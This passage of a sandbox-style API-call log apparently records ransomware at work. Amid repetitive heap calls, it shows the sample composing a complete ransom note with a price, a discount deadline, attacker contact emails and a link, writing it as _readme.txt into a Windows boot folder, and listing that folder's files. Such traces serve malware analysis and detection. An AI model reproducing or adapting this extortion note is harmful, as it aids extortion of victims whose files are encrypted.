returned 1 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.898] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0142.898] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.898] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.898] PathFindFileNameW (pszPath="") returned="" [0142.898] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.898] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.898] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.899] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.899] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0142.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.899] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0142.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.899] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.899] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.899] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.900] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.900] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.901] CloseHandle (hObject=0x6f0) returned 1 [0142.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.901] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8c57a90, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c57a90, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.902] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8c57a90, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c57a90, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.902] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.902] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c57a90, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8c57a90, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c7dbf0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.902] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c57a90, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8c57a90, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c7dbf0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.902] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.902] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.904] HeapFree (in: hHeap=0x620000, 